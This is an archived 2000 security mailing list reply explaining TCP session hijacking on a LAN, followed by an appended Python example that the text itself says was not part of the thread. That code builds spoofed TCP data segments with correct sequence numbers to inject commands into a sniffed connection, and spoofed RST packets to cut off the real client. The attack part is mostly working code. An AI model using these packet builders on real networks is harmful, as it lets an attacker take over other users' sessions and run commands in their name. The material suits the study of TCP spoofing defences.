Vulnerability Development mailing list archives

Re: Forge packets ?


From: "Samy Kamkar [CommPort5]" <CommPort5 () LUCIDX COM>
Date: Mon, 11 Sep 2000 20:42:45 +0100

Sure, it's very possible.  You may want to see 'hunt' (program, probably on
packetstorm.securify.com) and see how it does it.  Also, RFC 793 (TCP) will
describe TCP connections...once you understand that you will see how a
connection is hijacked.  Thing is, with your network you can send packets
looking exactly like ones coming from the local side, so the remote
connection would accept it.  And also, you're able to sniff the connection,
so you see exactly what the remote connection is sending back.  If you want
to fully hijack it (so the other user can't send/receive any more) you could
'probably' send RST packets to the other local connection (looking like
connections from the remote host) and you continue to send your packets to
the remote host, so the connection will only be dropped on the local side of
the original client but the connection keeps on going while you're sending
the packets.  I'm not sure if you can just send RST packets to local without
that local sending packets to close the connection on remote so you get a
fully closed connection, but I'm sure you can fully hijack a connection
without problems (local-to-remote, or the other way around).  This would
definitely require root (depending on the system, sometimes just certain
access to specific devices such as bpf) though...

-Sam [commport5]


Skreel wrote:

I have a few questions concerning forged packets.
I got a LAN that's connected to Internet, and I would like to know if it
could be possible for a local attacker to hijack a "local-to-remote"
connection in order to send forged packets without resetting the user's
connection.
thanks
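The packet-forging half of what Samy describes, as an added example that is not part of the original thread and not code from 'hunt': take the sequence/acknowledgement numbers from one sniffed client-to-server segment, build a data segment that looks like it came from the local client (so the remote host accepts it), and build an RST that looks like it came from the remote host (aimed at the local client). The IP addresses, ports, sequence numbers and payload below are constructed sample values, and the names `ConnState`, `forge_injection`, `forge_reset_to_client` and `parse_packet` are this example's own. Nothing here puts packets on the wire; doing that takes a raw socket (`socket.SOCK_RAW` with `IP_HDRINCL`), which needs root or bpf access as the post says.

```python
"""Build forged IPv4/TCP segments from state learned by sniffing (added example)."""
import socket
import struct
from dataclasses import dataclass

# TCP flag bits (RFC 793).
FIN, SYN, RST, PSH, ACK = 0x01, 0x02, 0x04, 0x08, 0x10


def ones_complement_checksum(data: bytes) -> int:
    """RFC 1071 checksum, used by both the IPv4 header and the TCP segment."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


@dataclass
class ConnState:
    """What a sniffer learns from one client->server segment (hypothetical helper)."""
    client_ip: str
    server_ip: str
    client_port: int
    server_port: int
    client_next_seq: int  # seq of the observed segment + its payload length
    server_next_seq: int  # the ack number the client sent, i.e. what it expects next

    @classmethod
    def from_sniffed(cls, cip, sip, cport, sport, seq, ack, payload_len):
        return cls(cip, sip, cport, sport, (seq + payload_len) & 0xFFFFFFFF, ack)


def build_tcp(src_ip, dst_ip, sport, dport, seq, ack, flags, data=b"", window=8192):
    """TCP header (no options) with the checksum over the pseudo-header + segment."""
    hdr = struct.pack("!HHIIHHHH", sport, dport, seq, ack, (5 << 12) | flags, window, 0, 0)
    pseudo = struct.pack("!4s4sBBH", socket.inet_aton(src_ip), socket.inet_aton(dst_ip),
                         0, socket.IPPROTO_TCP, len(hdr) + len(data))
    csum = ones_complement_checksum(pseudo + hdr + data)
    return hdr[:16] + struct.pack("!H", csum) + hdr[18:] + data


def build_ipv4(src_ip, dst_ip, payload, ident=0, ttl=64):
    """Minimal IPv4 header (IHL=5) carrying a TCP payload; source address is whatever we say."""
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), ident, 0, ttl,
                      socket.IPPROTO_TCP, 0, socket.inet_aton(src_ip), socket.inet_aton(dst_ip))
    csum = ones_complement_checksum(hdr)
    return hdr[:10] + struct.pack("!H", csum) + hdr[12:] + payload


def forge_injection(state: ConnState, data: bytes) -> bytes:
    """Data segment that looks like it came from the local client.

    Uses the client's next expected seq and acks the server's next seq, so the
    remote host accepts it as in-order data.  Advances our view of the client's
    seq so the next injected segment also lines up.
    """
    tcp = build_tcp(state.client_ip, state.server_ip, state.client_port, state.server_port,
                    state.client_next_seq, state.server_next_seq, PSH | ACK, data)
    pkt = build_ipv4(state.client_ip, state.server_ip, tcp)
    state.client_next_seq = (state.client_next_seq + len(data)) & 0xFFFFFFFF
    return pkt


def forge_reset_to_client(state: ConnState) -> bytes:
    """RST that looks like it came from the remote host, aimed at the local client.

    seq is the server's next seq, which is exactly what the client expects, so
    the client's stack accepts the RST and tears down its side.
    """
    tcp = build_tcp(state.server_ip, state.client_ip, state.server_port, state.client_port,
                    state.server_next_seq, state.client_next_seq, RST | ACK)
    return build_ipv4(state.server_ip, state.client_ip, tcp)


def parse_packet(pkt: bytes) -> dict:
    """Decode IPv4+TCP and verify both checksums, as the receiving stack would."""
    ihl = (pkt[0] & 0x0F) * 4
    seg = pkt[ihl:]
    sport, dport, seq, ack, off_flags, *_ = struct.unpack("!HHIIHHHH", seg[:20])
    pseudo = struct.pack("!4s4sBBH", pkt[12:16], pkt[16:20], 0, socket.IPPROTO_TCP, len(seg))
    return {
        "src": socket.inet_ntoa(pkt[12:16]), "dst": socket.inet_ntoa(pkt[16:20]),
        "sport": sport, "dport": dport, "seq": seq, "ack": ack,
        "flags": off_flags & 0x3F, "payload": seg[(off_flags >> 12) * 4:],
        "ip_ok": ones_complement_checksum(pkt[:ihl]) == 0,
        "tcp_ok": ones_complement_checksum(pseudo + seg) == 0,
    }


if __name__ == "__main__":
    # Constructed sample: we sniffed the client send 4 bytes with seq=1000, ack=5000.
    st = ConnState.from_sniffed("10.0.0.5", "192.0.2.10", 40000, 23, 1000, 5000, 4)
    print(parse_packet(forge_injection(st, b"id\r\n")))
    print(parse_packet(forge_reset_to_client(st)))
```

Note what happens to the real client once data has been injected: the remote host now expects a higher sequence number than the client will use, so the client's next genuine segment is out of window and gets acked rather than accepted, which is the point of sending it the RST. That is all this example shows; whether a RST to the local side also ends up closing the remote side is left exactly as the post leaves it.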

